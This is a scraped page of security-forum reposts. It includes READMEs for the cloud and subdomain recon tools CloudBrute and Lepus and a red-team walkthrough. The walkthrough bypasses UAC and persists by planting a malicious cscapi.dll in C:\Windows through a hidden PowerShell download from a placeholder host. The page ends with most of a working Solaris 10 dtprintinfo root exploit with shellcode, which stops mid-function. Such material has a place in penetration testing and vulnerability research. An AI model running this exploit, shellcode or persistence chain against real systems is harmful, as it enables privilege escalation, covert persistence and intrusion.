Sam Curry (https://twitter.com/samwcyo)
Neiko Rivera (https://twitter.com/_specters_)
Brett Buerhaus (https://twitter.com/bbuerhaus)
Maik Robert (https://twitter.com/xEHLE_)
Ian Carroll (https://twitter.com/iangcarroll)
Justin Rhinehart (https://twitter.com/sshell_)
Shubham Shah (https://twitter.com/infosec_au)

Special thanks to the following people who helped create this blog post:
Ben Sadeghipour (https://twitter.com/nahamsec)
Joseph Thacker (https://twitter.com/rez0__)

Sursa: https://samcurry.net/web-hackers-vs-the-auto-industry/
    4 points
  8. A reflected XSS in www.apple.com. The report was accepted. I'm not sure whether I'll get a reward, but I'll let you know.

Issues eligible for public acknowledgment: We review all issues reported to us, and all legitimate services issues are eligible for public acknowledgement. While we request that you report all issues, the following issues are eligible for bounty reward payments only if they're evaluated as novel or high impact, at Apple's discretion:
- Open redirects
- Reflected or self XSS
- Bugs requiring exceedingly unlikely user interaction
- Cross-site request forgery vulnerabilities where the only impact is logout
- Banner grabbing or service versions without a vulnerability or PoC
- Rate limiting, unless credentials are able to be guessed
- External and public credential dumps
- Denial of service vulnerabilities
- Username enumeration, unless some personally identifiable information is disclosed, like an email or phone number
- Reports from automated tools or scanners where the vulnerability is not proven
- Expired certificates
- DMARC/SPF misconfiguration concerns
- Social engineering
- Properties that are not owned or operated by Apple

Link: https://security.apple.com/bounty/categories/
    3 points
  9. CloudBrute

A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available here.

At a glance

Motivation

While working on HunterSuite, and as part of the job, we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers. Here is the list of issues we tried to fix:
- separated wordlists
- lack of proper concurrency
- lack of support for all major cloud providers
- requiring authentication, keys, or cloud CLI access
- outdated endpoints and regions
- incorrect file storage detection
- lack of support for proxies (useful for bypassing region restrictions)
- lack of support for user-agent randomization (useful for bypassing rare restrictions)
- hard to use, poorly configured

Features
- Cloud detection (IPINFO API and source code)
- Supports all major providers
- Black-box (unauthenticated)
- Fast (concurrent)
- Modular and easily customizable
- Cross-platform (Windows, Linux, Mac)
- User-agent randomization
- Proxy randomization (HTTP, SOCKS5)

Supported Cloud Providers
- Microsoft: Storage, Apps
- Amazon: Storage, Apps
- Google: Storage, Apps
- DigitalOcean: Storage
- Vultr: Storage
- Linode: Storage
- Alibaba: Storage

Version 1.0.0

Usage

Just download the latest release for your operating system and follow the usage. To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there. It looks like this:

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URL mutations, such as test-keyword.target.region and test.keyword.target.region, etc. (a sketch of this mutation scheme follows at the end of this item). We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool. After setting up your API key, you are ready to use CloudBrute.

[CloudBrute ASCII art banner - V 1.0.7]

usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
                  -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads <integer>]
                  [-T|--timeout <integer>] [-p|--proxy "<value>"] [-a|--randomagent "<value>"]
                  [-D|--debug] [-q|--quite] [-m|--mode "<value>"] [-o|--output "<value>"]
                  [-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:
  -h --help          Print help information
  -d --domain        domain
  -k --keyword       keyword used to generate urls
  -w --wordlist      path to wordlist
  -c --cloud         force a search, check config.yaml providers list
  -t --threads       number of threads. Default: 80
  -T --timeout       timeout per request in seconds. Default: 10
  -p --proxy         use proxy list
  -a --randomagent   user agent randomization
  -D --debug         show debug logs. Default: false
  -q --quite         suppress all output. Default: false
  -m --mode          storage or app. Default: storage
  -o --output        Output file. Default: out.txt
  -C --configFolder  Config path. Default: config

For example:

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

Please note: the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option:

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

Clone the repo, then:

go build -o CloudBrute main.go
go test internal

In action

How to contribute
- Add a module or fix something, then open a pull request.
- Share it with whomever you believe can use it.
- Do the extra work and share your findings with the community ♥

FAQ

How do I make the best out of this tool? Read the usage.

I get errors; what should I do? Make sure you read the usage correctly, and if you think you found a bug, open an issue.

When I use proxies, I get too many errors, or it's too slow? That's because you're using public proxies; use private, higher-quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

Too fast or too slow? Change the -T (timeout) option to get the best results for your run.

Credits

Inspired by every single repo listed here.

Sursa: https://github.com/0xsha/CloudBrute
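As referenced in the Usage section above, here is a rough Python sketch of how environment prefixes and a keyword might be combined into candidate names. This is a simplification for illustration, not CloudBrute's actual Go implementation (the real generator also handles provider-specific URL formats and regions); the S3-style URL is just one example expansion.

# Hypothetical reimplementation of the candidate-name mutation idea.
environments = ["test", "dev", "prod", "stage", "staging", "bak"]
keyword = "target"

candidates = set()
for env in environments:
    for sep in ("-", "."):          # test-keyword and test.keyword styles
        candidates.add(f"{env}{sep}{keyword}")
        candidates.add(f"{keyword}{sep}{env}")
candidates.add(keyword)             # the bare keyword itself

# Candidates then get expanded into provider URLs, e.g. S3-style buckets:
for name in sorted(candidates):
    print(f"https://{name}.s3.amazonaws.com")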
    3 points
  10. Yes, it is a paid internship.
    3 points
  11. You need to have a good accountant for this. In your case, I can recommend @Che; he can help you with both CPA and accounting.
    3 points
  12. https://www.yougetsignal.com/tools/web-sites-on-web-server/ , for example
    3 points
  13. At the moment we haven't defined a retention period for the data. Most likely 1-3 months at most; after 3 months, security logs stop being relevant. That said, there will certainly be clients who ask for a retention period of 1-2 years for security audits (most likely as a backup to their own solution). Soon there will be reports defined over certain time intervals and for certain purposes (e.g. management). Yes, brute force is supported. "Abuse" refers to a community-driven CTI source, namely abuseipdb.com. You're right: at the moment you can only create a user via register and add them to your organization. We will make that Send Invitation button work (at the moment it doesn't send any email). It's a very good idea for organizations that have 1-2 sites, but if you have 50 it doesn't make much sense anymore; we will have a favourite host/site feature and by default we'll show the things specific to that site. Thanks for the suggestion; we'll think about how to make the sites part easier to see (other than clicking on Hosts). Regarding the cloud, what matters most is how your web application runs. We have an API behind the scenes and can accept input from any method of capturing the data and sending it to an API. We will certainly have direct integration with the big clouds through their native tooling. We have a message queue layer and we scale through K8s.
    3 points
  14. For WordPress, 2performant have a plugin directly.
    2 points
  15. I tried; there's a limit on the vector.
    2 points
  16. assume-breach, Jan 20

Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence

Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we're going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right?

Getting Started

If you haven't read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post shows you how to set up your Powershell scripts, LNK file, and so forth for initial access to the target. Since we still have access to our target, we're going to start where we ended in the last article.

Here's the scenario: we have an administrative beacon in medium integrity through Havoc C2. You'll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about).

Running a "whoami", we see that our user, david, is part of the administrators group. For our persistence method to work, we need local admin. The reason is that we need access to "C:\Windows\", and this isn't accessible to domain users or administrators unless we are in a high integrity beacon/process. So, since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side-load a DLL and execute it in high integrity.

Using A UAC Bypass To Perform Administrative Actions

A typical UAC bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let's discuss the typical UAC bypass to get a beacon back to Havoc. This is the usual workflow:
1. Target downloads the malicious EXE.
2. We run HighBorn in memory using inline-execute.
3. HighBorn performs the UAC bypass and calls the EXE in high integrity.
4. We get a high integrity beacon.

Since we are bypassing Applocker protections, we don't have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC bypass performs administrative code execution, so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL.

DLL Side Loading For Persistence

I've seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side-loading vulnerability in Windows File Explorer. If you craft a malicious DLL, name it cscapi.dll, and place it in C:\Windows\, it will get executed when the user logs in. The caveat is that you must have local admin privileges to gain access to C:\Windows\. So let's begin by creating a malicious DLL.

Creating The Malicious DLL

To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you're on a real pentest), and I named my DLL appropriately for the exploit.

Modifying HighBorn.cs For Administrative Actions

Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. As you can see from the screenshot, this is a very simple DLL. We can use an easy Powershell command to download our cscapi.dll file into the Windows folder:

powershell -Sta -Nop -Window Hidden iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\Windows\cscapi.dll'

However, if we try to compile this, we get escape sequence errors. Let's encode our command into Base64 using Powershell:

$str = "powershell -Sta -Nop -Window Hidden iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\Windows\cscapi.dll'"
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Now we should have a good Base64 string (see the sketch after this item for how this encoding step works). Let's add it to the HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder:

x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,--subsystem,windows

Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put in our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command:

mcs HighBorn.cs /out:HighBorn.exe

We host secur32.dll and run our command in Havoc. On our Python server, we see it pull secur32.dll and then our cscapi.dll file! Moving to the Windows folder on the target, we see that our DLL is in place.

Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let's reboot the target and see if we get a shell back. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique!

The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password, you can perform this technique on any user's system for persistence on multiple workstations in the environment, without having to drop an EXE to disk.

Hopefully you found this article helpful or at least interesting. If you like my content, you can follow me on here or on Twitter @assume_breach

Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e
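As referenced above, PowerShell's Base64 command encoding uses UTF-16LE ([System.Text.Encoding]::Unicode), not UTF-8. Here is a small Python sketch reproducing the same encoding step, useful if you are building the string from a non-Windows attack box; the URL is a placeholder exactly as in the article.

import base64

# Same command as above; single quotes avoid C escape-sequence issues.
cmd = ("powershell -Sta -Nop -Window Hidden "
       "iwr -Uri 'http://IP:PORT/cscapi.dll' "
       "-Outfile 'C:\\Windows\\cscapi.dll'")

# PowerShell's ::Unicode encoding expects UTF-16LE bytes.
encoded = base64.b64encode(cmd.encode("utf-16-le")).decode()
print(encoded)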
    2 points
  17. Lepus Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port scans - and boy, is it fast! Basic Usage lepus.py yahoo.com Summary Enumeration modes Subdomain Takeover Port Scan Installation Arguments Full command example Enumeration modes The enumeration modes are different ways lepus uses to identify sudomains for a given domain. These modes are: Collectors Dictionary Permutations Reverse DNS Markov Moreover: For all methods, lepus checks if the given domain or any generated potential subdomain is a wildcard domain or not. After identification, lepus collects ASN and network information for the identified domains that resolve to public IP Addresses. Collectors The Collectors mode collects subdomains from the following services: Service API Required AlienVault OTX No Anubis-DB No Bevigil Yes BinaryEdge Yes BufferOver Yes C99 Yes Censys Yes CertSpotter No CommonCrawl No CRT No DNSDumpster No DNSRepo Yes DNSTrails Yes Farsight DNSDB Yes FOFA Yes Fullhunt Yes HackerTarget No HunterIO Yes IntelX Yes LeakIX Yes Maltiverse No Netlas Yes PassiveTotal Yes Project Discovery Chaos Yes RapidDNS No ReconCloud No Riddler Yes Robtex Yes SecurityTrails Yes Shodan Yes SiteDossier No ThreatBook Yes ThreatCrowd No ThreatMiner No URLScan Yes VirusTotal Yes Wayback Machine No Webscout No WhoisXMLAPI Yes ZoomEye Yes You can add your API keys in the config.ini file. The Collectors module will run by default on lepus. If you do not want to use the collectors during a lepus run (so that you don't exhaust your API key limits), you can use the -nc or --no-collectors argument. Dictionary The dictionary mode can be used when you want to provide lepus a list of subdomains. You can use the -w or --wordlist argument followed by the file. A custom list comes with lepus located at lists/subdomains.txt. An example run would be: lepus.py -w lists/subdomains.txt yahoo.com Permutations The Permutations mode performs changes on the list of subdomains that have been identified. For each subdomain, a number of permutations will take place based on the lists/words.txt file. You can also provide a custom wordlist for permutations with the -pw or --permutation-wordlist argument, followed by the file name.An example run would be: lepus.py --permutate yahoo.com or lepus.py --permutate -pw customsubdomains.txt yahoo.com ReverseDNS The ReverseDNS mode will gather all IP addresses that were resolved and perform a reverse DNS on each one in order to detect more subdomains. For example, if www.example.com resolves to 1.2.3.4, lepus will perform a reverse DNS for 1.2.3.4 and gather any other subdomains belonging to example.com, e.g. www2,internal or oldsite. To run the ReverseDNS module use the --reverse argument. Additionally, --ripe (or -ripe) can be used in order to instruct the module to query the RIPE database using the second level domain for potential network ranges. Moreover, lepus supports the --ranges (or -r) argument. You can use it to make reverse DNS resolutions against CIDRs that belong to the target domain. By default this module will take into account all previously identified IPs, then defined ranges, then ranges identified through the RIPE database. In case you only want to run the module against specific or RIPE identified ranges, and not against all already identified IPs, you can use the --only-ranges (-or) argument. 
An example run would be:

lepus.py --reverse yahoo.com

or

lepus.py --reverse -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com

or, only against the defined or RIPE-identified ranges:

lepus.py --reverse -or -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com

Hint: lepus will identify ASNs and Networks during enumeration, so you can also use these ranges to identify more subdomains with a subsequent run.

Markov

With this module, Lepus will utilize Markov chains in order to train itself and then generate subdomains based on the already known ones. The bigger the general surface, the better the tool will be able to train itself and, subsequently, the better the results will be. The module can be activated with the --markovify argument. Parameters also include the Markov state size, the maximum length of the generated candidate addition, and the quantity of generated candidates. Predefined values are 3, 5 and 5 respectively. Those arguments can be changed with -ms (--markov-state), -ml (--markov-length) and -mq (--markov-quantity) to meet your needs. Keep in mind that the larger these values are, the more time Lepus will need to generate the candidates. It has to be noted that different executions of this module might generate different candidates, so feel free to run it a few times consecutively.

lepus.py --markovify yahoo.com

or

lepus.py --markovify -ms 5 -ml 10 -mq 10

Subdomain Takeover

Lepus has a list of signatures in order to identify if a domain can be taken over. You can use it by providing the --takeover argument. This module also supports Slack notifications, once a potential takeover has been identified, by adding a Slack token in the config.ini file. The checks are made against the following services:

Acquia, Activecampaign, Aftership, Aha!, Airee, Amazon AWS/S3, Apigee, Azure, Bigcartel, Bitbucket, Brightcove, Campaign Monitor, Cargo Collective, Desk, Feedpress, Fly.io, Getresponse, Ghost.io, Github, Hatena, Helpjuice, Helpscout, Heroku, Instapage, Intercom, JetBrains, Kajabi, Kayako, Launchrock, Mashery, Maxcdn, Moosend, Ning, Pantheon, Pingdom, Readme.io, Simplebooklet, Smugmug, Statuspage, Strikingly, Surge.sh, Surveygizmo, Tave, Teamwork, Thinkific, Tictail, Tilda, Tumblr, Uptime Robot, UserVoice, Vend, Webflow, Wishpond, Wordpress, Zendesk

Port Scan

The port scan module will check open ports against a target and log them in the results. You can use the --portscan argument, which by default will scan ports 80, 443, 8000, 8080, 8443. You can also use custom ports or choose a predefined set of ports (see the connect-scan sketch at the end of this post for what these checks boil down to).
Ports set          Ports
small              80, 443
medium (default)   80, 443, 8000, 8080, 8443
large              80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 9000, 9090, 9443
huge               80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9943, 9980, 9981, 12443, 16080, 18091, 18092, 20720, 28017

An example run would be:

lepus.py --portscan yahoo.com

or

lepus.py --portscan -p huge yahoo.com

or

lepus.py --portscan -p 80,443,8082,65123 yahoo.com

Installation

Normal installation:

$ python3.7 -m pip install -r requirements.txt

Preferably install in a virtualenv:

$ pyenv virtualenv 3.7.4 lepus
$ pyenv activate lepus
$ pip install -r requirements.txt

Installing latest python on debian:

$ apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget
$ curl -O https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tar.xz
$ tar -xf Python-3.7.4.tar.xz
$ cd Python-3.7.4
$ ./configure --enable-optimizations --enable-loadable-sqlite-extensions
$ make
$ make altinstall

Arguments

usage: lepus.py [-h] [-w WORDLIST] [-hw] [-t THREADS] [-nc] [-zt]
                [--permutate] [-pw PERMUTATION_WORDLIST] [--reverse]
                [-r RANGES] [--portscan] [-p PORTS] [--takeover]
                [--markovify] [-ms MARKOV_STATE] [-ml MARKOV_LENGTH]
                [-mq MARKOV_QUANTITY] [-f] [-v]
                domain

Infrastructure OSINT

positional arguments:
  domain                domain to search

optional arguments:
  -h, --help            show this help message and exit
  -w WORDLIST, --wordlist WORDLIST
                        wordlist with subdomains
  -hw, --hide-wildcards
                        hide wildcard resolutions
  -t THREADS, --threads THREADS
                        number of threads [default is 100]
  -nc, --no-collectors  skip passive subdomain enumeration
  -zt, --zone-transfer  attempt to zone transfer from identified name servers
  --permutate           perform permutations on resolved domains
  -pw PERMUTATION_WORDLIST, --permutation-wordlist PERMUTATION_WORDLIST
                        wordlist to perform permutations with [default is lists/words.txt]
  --reverse             perform reverse dns lookups on resolved public IP addresses
  -ripe, --ripe         query ripe database with the 2nd level domain for networks to be used for reverse lookups
  -r RANGES, --ranges RANGES
                        comma seperated ip ranges to perform reverse dns lookups on
  -or, --only-ranges    use only ranges provided with -r or -ripe and not all previously identifed IPs
  --portscan            scan resolved public IP addresses for open ports
  -p PORTS, --ports PORTS
                        set of ports to be used by the portscan module [default is medium]
  --takeover            check identified hosts for potential subdomain take-overs
  --markovify           use markov chains to identify more subdomains
  -ms MARKOV_STATE, --markov-state MARKOV_STATE
                        markov state size [default is 3]
  -ml MARKOV_LENGTH, --markov-length MARKOV_LENGTH
                        max length of markov substitutions [default is 5]
  -mq MARKOV_QUANTITY, --markov-quantity MARKOV_QUANTITY
                        max quantity of markov results per candidate length [default is 5]
  -f, --flush           purge all records of the specified domain from the database
  -v, --version         show program's version number and exit

Full command example

The following is an example run with all available active arguments:
./lepus.py python.org --wordlist lists/subdomains.txt --permutate -pw ~/mypermsword.lst --reverse -ripe -r 10.11.12.0/24 --portscan -p huge --takeover --markovify -ms 3 -ml 10 -mq 10

The following command flushes all database entries for a specific domain:

./lepus.py python.org --flush

Sursa: https://github.com/GKNSB/Lepus
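As an aside to the port scan module above: a port scan of this kind essentially amounts to TCP connect checks. A minimal sketch in Python, illustrative only and not Lepus's actual implementation:

    import socket

    # Minimal TCP connect scan: a port counts as open if connect() succeeds.
    def scan(host, ports, timeout=2.0):
        open_ports = []
        for port in ports:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((host, port)) == 0:  # 0 means the handshake completed
                    open_ports.append(port)
        return open_ports

    # The "medium" (default) port set from the table above.
    print(scan("example.com", [80, 443, 8000, 8080, 8443]))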
    2 points
18. That's because you've got a lot of money. Mind you, holding your wallet over the keypad is pointless if you can feel a thin film over the keys or see a nice-looking overlay casing :)). Better not to withdraw money outside Valcea at all.
    2 points
19. Solaris 10 CDE local privilege escalation exploit that achieves root by injecting a fake printer via lpstat and using a buffer overflow in libXm ParseColors().

/*
 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
 * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * "What has been will be again,
 *  what has been done will be done again;
 *  there is nothing new under the Sun."
 * -- Ecclesiastes 1:9
 *
 * #Solaris #CDE #0day #ForeverDay #WontFix
 *
 * This exploit illustrates yet another way to abuse the infamous dtprintinfo
 * binary distributed with the Common Desktop Environment (CDE), a veritable
 * treasure trove for bug hunters since the 1990s. It's not the most reliable
 * exploit I've ever written, but I'm quite proud of the new vulnerabilities
 * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January
 * 2021) applied. The exploit chain is structured as follows:
 * 1. Inject a fake printer via the printer injection bug I found in lpstat.
 * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors().
 * 3. Enjoy root privileges!
 *
 * For additional details on my bug hunting journey and on the vulnerabilities
 * themselves, you can refer to the official advisory:
 * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt
 *
 * Usage:
 * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall
 * $ ./raptor_dtprintlibXmas 10.0.0.109:0
 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE
 * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Using SI_PLATFORM       : i86pc (5.10)
 * Using stack base        : 0x8047fff
 * Using safe address      : 0x8045790
 * Using rwx_mem address   : 0xfeffa004
 * Using sc address        : 0x8047fb4
 * Using sprintf() address : 0xfefd1250
 * Path of target binary   : /usr/dt/bin/dtprintinfo
 *
 * On your X11 server:
 * 1. Select the "fnord" printer, then click on "Selected" > "Properties".
 * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu.
 *
 * Back to your original shell:
 * # id
 * uid=0(root) gid=1(other)
 *
 * IMPORTANT NOTE.
 * The buffer overflow corrupts some critical variables in memory, which we
 * need to fix. In order to do so, we must patch the hostile buffer at some
 * fixed locations with the first argument of the last call to ParseColors().
 * The easiest way to get such a safe address is via the special 0x41414141
 * command-line argument and truss, as follows:
 * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT
 * $ grep ParseColors OUT | tail -1
 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724)
 *                                 ^^^^^^^^^ << this is the safe address we need
 *
 * Tested on:
 * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021)
 * [previous Solaris versions are also likely vulnerable]
 */

#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>

#define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE"
#define INFO2 "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define VULN "/usr/dt/bin/dtprintinfo"  // vulnerable program
#define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging

#define BUFSIZE 1106 // size of hostile buffer
#define PADDING 1    // hostile buffer padding
#define SAFE 0x08045770 // 1st arg to ParseColors()

char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */
/* triple setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";

/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;

/* prototypes */
int add_env(char *string);
void check_bad(int addr, char *name);
int get_env_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
    char buf[BUFSIZE], cmd[1024], *vuln = VULN;
    char platform[256], release[256], display[256];
    int i, sc_addr, safe_addr = SAFE;
    FILE *fp;

    int sb = ((int)argv[0] | 0xfff);  // stack base
    int ret = search_ldso("sprintf"); // sprintf() in ld.so.1
    int rwx_mem = search_rwx_mem();   // rwx memory

    /* helper that prints argv[0] address, used by get_env_addr() */
    if (!strcmp(argv[0], arg[0])) {
        printf("0x%p\n", argv[0]);
        exit(0);
    }

    /* print exploit information */
    fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

    /* process command line */
    if ((argc < 2) || (argc > 3)) {
        fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]);
        exit(1);
    }
    snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]);
    if (argc > 2) {
        safe_addr = (int)strtoul(argv[2], (char **)NULL, 0);
    }

    /* enter debug mode */
    if (safe_addr == 0x41414141) {
        unlink(DEBUG);
        snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG);
        if (system(cmd) == -1) {
            perror("error creating debug binary");
            exit(1);
        }
        vuln = DEBUG;
    }

    /* fill envp while keeping padding */
    add_env("LPDEST=fnord");       // injected printer
    add_env("HOME=/tmp");          // home directory
    add_env("PATH=/usr/bin:/bin"); // path
    sc_addr = add_env(display);    // x11 display
    add_env(sc);                   // shellcode
    add_env(NULL);

    /* calculate shellcode address */
    sc_addr += get_env_addr(vuln, argv);

    /* inject a fake printer */
    unlink("/tmp/.printers");
    unlink("/tmp/.printers.new");
    if (!(fp = fopen("/tmp/.printers", "w"))) {
        perror("error injecting a fake printer");
        exit(1);
    }
    fprintf(fp, "fnord :\n");
    fclose(fp);
    link("/tmp/.printers", "/tmp/.printers.new");

    /* craft the hostile buffer */
    bzero(buf, sizeof(buf));
    for (i = PADDING; i < BUFSIZE - 16; i += 4) {
        set_val(buf, i, ret);          // sprintf()
        set_val(buf, i += 4, rwx_mem); // saved eip
        set_val(buf, i += 4, rwx_mem); // 1st arg
        set_val(buf, i += 4, sc_addr); // 2nd arg
    }
    memcpy(buf, "\"c c ", 5); // beginning of hostile buffer
    buf[912] = ' ';           // string separator
    set_val(buf, 1037, safe_addr);  // safe address
    set_val(buf, 1065, safe_addr);  // safe address
    set_val(buf, 1073, 0xffffffff); // -1

    /* create the hostile XPM icon files */
    system("rm -fr /tmp/.dt");
    mkdir("/tmp/.dt", 0755);
    mkdir("/tmp/.dt/icons", 0755);
    if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) {
        perror("error creating XPM icon files");
        exit(1);
    }
    fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf);
    fclose(fp);
    link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm");
    link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm");

    /* print some output */
    sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
    sysinfo(SI_RELEASE, release, sizeof(release) - 1);
    fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
    fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
    fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr);
    fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
    fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
    fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret);
    fprintf(stderr, "Path of target binary\t: %s\n\n", vuln);

    /* check for badchars */
    check_bad(safe_addr, "safe address");
    check_bad(rwx_mem, "rwx_mem address");
    check_bad(sc_addr, "sc address");
    check_bad(ret, "sprintf() address");

    /* run the vulnerable program */
    execve(vuln, arg, env);
    perror("execve");
    exit(0);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
    int i;

    /* null termination */
    if (!string) {
        env[env_pos] = NULL;
        return env_len;
    }

    /* add the variable to envp */
    env[env_pos] = string;
    env_len += strlen(string) + 1;
    env_pos++;

    /* pad envp using zeroes */
    if ((strlen(string) + 1) % 4)
        for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
            env[env_pos] = string + strlen(string);
            env_len++;
        }

    return env_len;
}

/*
 * check_bad(): check an address for the presence of badchars
 */
void check_bad(int addr, char *name)
{
    int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP

    for (i = 0; i < sizeof(bad) / sizeof(int); i++) {
        if (((addr & 0xff) == bad[i]) ||
            ((addr & 0xff00) == bad[i]) ||
            ((addr & 0xff0000) == bad[i]) ||
            ((addr & 0xff000000) == bad[i])) {
            fprintf(stderr, "error: %s contains a badchar\n", name);
            exit(1);
        }
    }
}

/*
 * get_env_addr(): get environment address using a helper program
 */
int get_env_addr(char *path, char **argv)
{
